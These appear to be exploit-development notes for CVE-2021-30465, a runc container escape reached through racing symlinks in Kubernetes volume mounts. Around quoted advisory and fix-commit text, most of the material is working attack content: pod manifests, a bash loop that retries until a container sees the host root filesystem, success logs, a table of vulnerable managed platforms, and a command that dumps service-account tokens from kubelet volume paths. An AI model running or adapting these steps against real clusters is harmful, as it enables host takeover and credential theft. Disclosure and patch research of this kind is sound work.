func TestStripRoot(t *testing.T) {
for _, test := range []struct {
root, path, out string
// Works with multiple components.
{"/a/b", "/a/b/c", "/c"},
{"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"},
// '/' must be a no-op.
{"/", "/a/b/c", "/a/b/c"},
// Must be the correct order.
{"/a/b", "/a/c/b", "/a/c/b"},
// Must be at start.
{"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"},
// Must be a lexical parent.
{"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"},
// Must only strip the root once.
{"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"},
// Deal with .. in a fairly sane way.
{"/foo/bar", "/foo/bar/../baz", "/foo/baz"},
{"/foo/bar", "../../../../../../foo/bar/baz", "/baz"},
{"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"},
{"/foo/bar/../baz", "/foo/baz/bar", "/bar"},
{"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"},
// All paths are made absolute before stripping.
{"foo/bar", "/foo/bar/baz/bee", "/baz/bee"},
{"/foo/bar", "foo/bar/baz/beef", "/baz/beef"},
{"foo/bar", "foo/bar/baz/beets", "/baz/beets"},
} {
got := stripRoot(test.root, test.path)
if got != test.out {
t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out)
Text from the CVE:
However, it turns out with some container orchestrators (such as Kubernetes --
though it is very likely that other downstream users of runc could have similar
behaviour be accessible to untrusted users), the existence of additional volume
management infrastructure allows this attack to be applied to gain access to
the host filesystem without requiring the attacker to have completely arbitrary
control over container configuration.
In the case of Kubernetes, this is exploitable by creating a symlink in a
volume to the top-level (well-known) directory where volumes are sourced from
(for instance,
`/var/lib/kubelet/pods/$MY_POD_UID/volumes/`), and then
using that symlink as the target of a mount. The source of the mount is an
attacker controlled directory, and thus the source directory from which
subsequent mounts will occur is an attacker-controlled directory. Thus the
attacker can first place a symlink to `/` in their malicious source directory
with the name of a volume, and a subsequent mount in the container will
bind-mount `/` into the container.
Applying this attack requires the attacker to start containers with a slightly
peculiar volume configuration (though not explicitly malicious-looking such as
bind-mounting `/` into the container explicitly), and be able to run malicious
code in a container that shares volumes with said volume configuration. It
helps the attacker if the host paths used for volume management are well known,
though this is not a hard requirement.
Text from commit
rootfs: add mount destination validation
Because the target of a mount is inside a container (which may be a
volume that is shared with another container), there exists a race
condition where the target of the mount may change to a path containing
a symlink after we have sanitised the path -- resulting in us
inadvertently mounting the path outside of the container.
This is not immediately useful because we are in a mount namespace with
MS_SLAVE mount propagation applied to "/", so we cannot mount on top of
host paths in the host namespace. However, if any subsequent mountpoints
in the configuration use a subdirectory of that host path as a source,
those subsequent mounts will use an attacker-controlled source path
(resolved within the host rootfs) -- allowing the bind-mounting of "/"
into the container.
While arguably configuration issues like this are not entirely within
runc's threat model, within the context of Kubernetes (and possibly
other container managers that provide semi-arbitrary container creation
privileges to untrusted users) this is a legitimate issue. Since we
cannot block mounting from the host into the container, we need to block
the first stage of this attack (mounting onto a path outside the
The long-term plan to solve this would be to migrate to libpathrs, but
as a stop-gap we implement libpathrs-like path verification through
readlink(/proc/self/fd/$n) and then do mount operations through the
procfd once it's been verified to be inside the container. The target
could move after we've checked it, but if it is inside the container
then we can assume that it is safe for the same reason that libpathrs
operations would be safe.
A slight wrinkle is the "copyup" functionality we provide for tmpfs,
which is the only case where we want to do a mount on the host
filesystem. To facilitate this, I split out the copy-up functionality
entirely so that the logic isn't interspersed with the regular tmpfs
logic. In addition, all dependencies on m.Destination being overwritten
have been removed since that pattern was just begging to be a source of
more mount-target bugs (we do still have to modify m.Destination for
tmpfs-copyup but we only do it temporarily).
Fixes: CVE-2021-30465
Reported-by: Etienne Champetier <>
Co-authored-by: Noah Meyerhans <>
Reviewed-by: Samuel Karp <>
Reviewed-by: Kir Kolyshkin <> (@kolyshkin)
Reviewed-by: Akihiro Suda <>
Signed-off-by: Aleksa Sarai <>
Dev Setup is a kind cluster
$▶ kind version
kind v0.11.0 go1.16.3 darwin/amd64
$▶ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc94
commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf
spec: 1.0.2-dev
go: go1.16.4
libseccomp: 2.5.1
Second dev setup
$ kind version
kind v0.8.1 go1.14.2 darwin/amd64
$ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc10
spec: 1.0.1-dev
This requires two different deployments that each target the same "mount point"
First deployment mounts and creates a symlink of at a well defined place in the nodes fs.
Second deployment mounts and follows the symlink to exploit town.
This is a single pod spec with multiple volumes much like subpath exploit but with different symlink targets: one that satisfies the "inside the container" check but has something else going for it that lets the second mount follow it back.
learn underlying host path for volume that is shared.
grep empty /proc/1/task/1/mountinfo
1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/ /rootfs rw,relatime - ext4 /dev/vda1 rw
1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/ /status rw,relatime - ext4 /dev/vda1 rw
pushed a symlink example container here: mauilion/symlinks:push
My exploit uses:
1) multiple containers
2) empty dir volumes / tmpfs (but some other types are likely usable)
3) mount into mounts, ie
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt2
If you can forbid mount into mounts you prevent this attack
Don't hesitate to ping me in public issue if needed
apiVersion: v1
kind: Pod
name: honk
- image: nginx:stable
name: prehonk
imagePullPolicy: "IfNotPresent"
command: ["/bin/bash"]
args: ["-xc", "cd /mnt1 && ln -s / mnt2 "]
- mountPath: /mnt1
name: test1
- image: nginx:stable
name: exploit
imagePullPolicy: "IfNotPresent"
command: ["/bin/bash"]
args: ["-c", "sleep infinity"]
- mountPath: /test1/mnt2
name: test2
- mountPath: /test1
name: test1
- name: test1
emptyDir: {}
- name: test2
emptyDir: {}
apiVersion: v1
kind: Pod
name: honk
- image: nginx:stable
name: prehonk
imagePullPolicy: "IfNotPresent"
command: ["/bin/bash"]
args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape/status/)"]
- mountPath: /rootfs
name: escape-volume
- image: nginx:stable
name: exploitj
imagePullPolicy: "IfNotPresent"
command: ["/bin/bash"]
args: ["-c", "sleep infinity"]
- mountPath: /rootfs/status
name: escape-volume
- name: escape-volume
emptyDir: {}
- name: status-volume
emptyDir: {}
trick to grab logs for failed pod on the host
this grabs the recently exited prehonk container and grabs the logs from it.
root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}')
+ cd /mnt1
+ ln -s / mnt2
ln: failed to create symbolic link 'mnt2/': File exists
Working exploit code:
# honk-pod.yaml
apiVersion: v1
kind: Pod
name: honk
#runAsUser: 1000
#runAsGroup: 1000
- image: nginx:latest
imagePullPolicy: IfNotPresent
name: 0-link0
command: ["/bin/bash"]
args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"]
- mountPath: /honk
name: escape-volume
- image: nginx:latest
imagePullPolicy: Always
name: 1-honk
command: ["sleep", "infinity"]
- mountPath: /honk
name: escape-volume
- mountPath: /honk/host
name: host-volume
- image: nginx:latest
imagePullPolicy: Always
name: 2-honk
command: ["sleep", "infinity"]
- mountPath: /honk
name: escape-volume
- mountPath: /honk/host
name: host-volume
- image: nginx:latest
imagePullPolicy: Always
name: 3-honk
command: ["sleep", "infinity"]
- mountPath: /honk
name: escape-volume
- mountPath: /honk/host
name: host-volume
- name: escape-volume
emptyDir: {}
- name: host-volume
emptyDir: {}
#!/usr/bin/env bash
while [ $RUNS -lt 100 ]; do
kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null
sleep 3
kubectl apply -f honk-pod.yaml
kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null
while [ $COUNTER -lt 4 ]; do
echo -n "Checking $COUNTER-honk for the host mount..."
# count the pid directories on the host if there are more than 5
# we have a success.
if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then
#if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
# Kind
#if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
# Civo/k3s
#if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
echo "SUCCESS after $RUNS runs!"
echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash"
exit 0
echo "nope."
let RUNS=$RUNS+1
$ ./
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...SUCCESS after 22 runs!
Run kubectl exec -it honk -c 3-honk -- bash
By seeing /run/runc
in in the exploit container, we know we have a hostpath mount working because that path only exists on the underlying node and not inside our nginx container. This may vary per target, but it's easy enough to adjust if needed.
$ kubectl exec -it exploit -c 3-honk -- bash
root@honk:/# ls
bin boot dev etc home kind lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
$ kubectl exec -it exploit -c 3-honk -- crictl ps
f354220ae48d3 f0b8a9a541369 8 minutes ago Running 3-honk 2 d6cfcd0c10c43
847a2f406e30f f0b8a9a541369 8 minutes ago Running 2-honk 0 d6cfcd0c10c43
7d6994acef655 f0b8a9a541369 8 minutes ago Running 1-honk 0 d6cfcd0c10c43
36ac6b9ef00d0 f0b8a9a541369 8 minutes ago Running 0-link 0 d6cfcd0c10c43
c672feb53eaa9 e422121c9c5f9 18 hours ago Running local-path-provisioner 0 aedc00f117150
8a3fea897c809 bfe3a36ebd252 18 hours ago Running coredns 0 cbda6967dd1f7
afe11ac87a75e bfe3a36ebd252 18 hours ago Running coredns 0 6f26d4dcd0e2e
79d5da0a84ef1 6b17089e24fdb 18 hours ago Running kindnet-cni 0 8539b3556a14b
e9b44cb76c812 23b52beab6e55 18 hours ago Running kube-proxy 0 815a6a9064842
c80612e8c9e52 0369cf4303ffd 18 hours ago Running etcd 0 0563e084fe6ee
09ef10a38b9e8 51dc9758caa7b 18 hours ago Running kube-controller-manager 0 c566b807c748b
d0f8fb646cd32 3ad0575b6f104 18 hours ago Running kube-apiserver 0 327abdbfe5320
396e975f0500a cd40419687469 18 hours ago Running kube-scheduler 0 950216aec91d8
root@honk:/# amicontained
Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: unconfined
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (20):
Looking for Docker.sock
# find -L /var/lib/kubelet/pods/*/volumes/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g';
Inspect an exploited container from the host
# crictl inspect e1e8927a546a6
"status": {
"id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"metadata": {
"attempt": 0,
"name": "2-exploit"
"createdAt": "2021-05-21T00:52:20.8831732Z",
"startedAt": "2021-05-21T00:52:21.0110818Z",
"finishedAt": "1970-01-01T00:00:00Z",
"exitCode": 0,
"image": {
"annotations": {},
"image": ""
"imageRef": "",
"reason": "",
"message": "",
"labels": {
"": "2-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "b5a5fa",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"mounts": [
"containerPath": "/rootfs",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/rootfs/host",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/var/run/secrets/",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": true,
"selinuxRelabel": false
"containerPath": "/etc/hosts",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/dev/termination-log",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log"
"info": {
"sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
"pid": 2894296,
"removing": false,
"snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"snapshotter": "overlayfs",
"runtimeType": "io.containerd.runc.v2",
"runtimeOptions": null,
"config": {
"metadata": {
"name": "2-exploit"
"image": {
"image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
"command": [
"envs": [
"value": ""
"value": ""
"value": "443"
"value": "443"
"value": "tcp://"
"value": "tcp://"
"value": "tcp"
"value": "443"
"mounts": [
"container_path": "/rootfs",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/rootfs/host",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/var/run/secrets/",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"readonly": true
"container_path": "/etc/hosts",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
"container_path": "/dev/termination-log",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a"
"labels": {
"": "2-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "b5a5fa",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"log_path": "2-exploit/0.log",
"linux": {
"resources": {
"cpu_period": 100000,
"cpu_shares": 2,
"oom_score_adj": 1000,
"hugepage_limits": [
"page_size": "1GB"
"page_size": "2MB"
"security_context": {
"namespace_options": {
"pid": 1
"run_as_user": {},
"masked_paths": [
"readonly_paths": [
"runtimeSpec": {
"ociVersion": "1.0.2-dev",
"process": {
"user": {
"uid": 0,
"gid": 0
"args": [
"env": [
"cwd": "/",
"capabilities": {
"bounding": [
"effective": [
"inheritable": [
"permitted": [
"oomScoreAdj": 1000
"root": {
"path": "rootfs"
"mounts": [
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": [
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"destination": "/rootfs",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/rootfs/host",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/etc/hosts",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"options": [
"destination": "/dev/termination-log",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
"options": [
"destination": "/etc/hostname",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
"options": [
"destination": "/etc/resolv.conf",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
"options": [
"destination": "/dev/shm",
"type": "bind",
"source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
"options": [
"destination": "/var/run/secrets/",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"annotations": {
"io.kubernetes.cri.container-name": "2-exploit",
"io.kubernetes.cri.container-type": "container",
"io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
"linux": {
"resources": {
"devices": [
"allow": false,
"access": "rwm"
"memory": {},
"cpu": {
"shares": 2,
"period": 100000
"cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"namespaces": [
"type": "pid"
"type": "ipc",
"path": "/proc/2893298/ns/ipc"
"type": "uts",
"path": "/proc/2893298/ns/uts"
"type": "mount"
"type": "network",
"path": "/proc/2893298/ns/net"
"maskedPaths": [
"readonlyPaths": [
Inspect a non-exploited container
# crictl inspect addfd289b2769
"status": {
"id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"metadata": {
"attempt": 0,
"name": "1-exploit"
"createdAt": "2021-05-21T00:52:20.4450061Z",
"startedAt": "2021-05-21T00:52:20.6401701Z",
"finishedAt": "1970-01-01T00:00:00Z",
"exitCode": 0,
"image": {
"annotations": {},
"image": ""
"imageRef": "",
"reason": "",
"message": "",
"labels": {
"": "1-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "7a407414",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"mounts": [
"containerPath": "/rootfs",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/rootfs/host",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/var/run/secrets/",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": true,
"selinuxRelabel": false
"containerPath": "/etc/hosts",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/dev/termination-log",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log"
"info": {
"sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
"pid": 2893952,
"removing": false,
"snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"snapshotter": "overlayfs",
"runtimeType": "io.containerd.runc.v2",
"runtimeOptions": null,
"config": {
"metadata": {
"name": "1-exploit"
"image": {
"image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
"command": [
"envs": [
"value": ""
"value": ""
"value": "443"
"value": "443"
"value": "tcp://"
"value": "tcp://"
"value": "tcp"
"value": "443"
"mounts": [
"container_path": "/rootfs",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/rootfs/host",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/var/run/secrets/",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"readonly": true
"container_path": "/etc/hosts",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
"container_path": "/dev/termination-log",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf"
"labels": {
"": "1-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "7a407414",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"log_path": "1-exploit/0.log",
"linux": {
"resources": {
"cpu_period": 100000,
"cpu_shares": 2,
"oom_score_adj": 1000,
"hugepage_limits": [
"page_size": "1GB"
"page_size": "2MB"
"security_context": {
"namespace_options": {
"pid": 1
"run_as_user": {},
"masked_paths": [
"readonly_paths": [
"runtimeSpec": {
"ociVersion": "1.0.2-dev",
"process": {
"user": {
"uid": 0,
"gid": 0
"args": [
"env": [
"cwd": "/",
"capabilities": {
"bounding": [
"effective": [
"inheritable": [
"permitted": [
"oomScoreAdj": 1000
"root": {
"path": "rootfs"
"mounts": [
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": [
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"destination": "/rootfs",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/rootfs/host",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/etc/hosts",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"options": [
"destination": "/dev/termination-log",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
"options": [
"destination": "/etc/hostname",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
"options": [
"destination": "/etc/resolv.conf",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
"options": [
"destination": "/dev/shm",
"type": "bind",
"source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
"options": [
"destination": "/var/run/secrets/",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"annotations": {
"io.kubernetes.cri.container-name": "1-exploit",
"io.kubernetes.cri.container-type": "container",
"io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
"linux": {
"resources": {
"devices": [
"allow": false,
"access": "rwm"
"memory": {},
"cpu": {
"shares": 2,
"period": 100000
"cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"namespaces": [
"type": "pid"
"type": "ipc",
"path": "/proc/2893298/ns/ipc"
"type": "uts",
"path": "/proc/2893298/ns/uts"
"type": "mount"
"type": "network",
"path": "/proc/2893298/ns/net"
"maskedPaths": [
"readonlyPaths": [
D: I've pushed an image with runc r95 baked in. You can use it like:
This has k8s 1.20.7 containerd 1.5.2 and runc rc95.
kind create cluster --image=mauilion/node:runc95
Platform | Version | K8s | Containerd | Runc | Success |
Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc92 | Yes |
Kind | 0.11.0 | 1.21.1 | 1.5.1 | 1.0.0-rc94 | Yes |
Kind | 0.11.0 | 1.20.7 | 1.5.2 | 1.0.0-rc95 | No |
Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc95+dev* | No |
Kubeadm | 1.21.1 | 1.21.1 | 1.4.4 | 1.0.0-rc93 | Yes |
GKE regular | 1.19.9-gke.1400 | 1.19.9 | 1.4.3 | 1.0.0-rc10 | Yes |
GKE alpha | 1.20.6-gke.1000 | 1.20.6 | 1.4.3 | 1.0.0-rc92 | Yes |
EKS | 1.19.8-eks-96780e | 1.19.8 | 1.4.1 | 1.0.0-rc92 | Yes** |
AKS | regular | 1.19.9 | 1.4.4+azure | 1.0.0-rc92 | Yes |
Civo | latest | v1.20.0-k3s1 | 1.4.3-k3s1 | 1.0.0-rc92 | Yes |
RKE1 | 1.2.8 | 1.20.6 | 1.4.4 | 1.0.0-rc93 | Yes |
* Compiled runc by hand from HEAD on 5/23
** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier
Etienne's original report
Hello runc maintainers,
When mounting a volume, runc trusts the source, and will follow
symlinks, but it doesn't trust the target argument and will use
'filepath-securejoin' library to resolve any symlink and ensure the
resolved target stays inside the container root.
As explained in SecureJoinVFS documentation
using this function is only safe if you know that the checked file is
not going to be replaced by a symlink, the problem is that we can
replace it by a symlink.
In K8S there is a trivial way to control the target, create a pod with
multiple containers sharing some volumes, one with a correct image,
and the other ones with non existing images so they don't start right
Let's start with the POC first and the explanations after
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
name: attack
terminationGracePeriodSeconds: 1
- name: c1
image: ubuntu:latest
command: [ "/bin/sleep", "inf" ]
- name: MY_POD_UID
fieldPath: metadata.uid
volumeMounts:- name: test1
mountPath: /test1- name: test2
mountPath: /test2
$(for c in {2..20}; do
cat <<EOC- name: c$c
command: [ "/bin/sleep", "inf" ]
- name: test1
mountPath: /test1
$(for m in {1..4}; do
cat <<EOM- name: test2
mountPath: /test1/mnt$m
)- name: test2
mountPath: /test1/zzz
volumes:- name: test1
medium: "Memory"- name: test2
medium: "Memory"
gcc race.c -O3 -o race
and exec bash
sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 – bash
ln -s / /test2/test2
cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/
so that the other containers can start
for c in {2..20}; do
kubectl set image pod attack c$c=ubuntu:latest
for c in {2..20}; do
echo ~~ Container c\(c ~~ kubectl exec -ti pod/attack -c c\)c – ls /test1/zzz
~~ Container c2 ~~
~~ Container c3 ~~
~~ Container c4 ~~
~~ Container c5 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c6 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
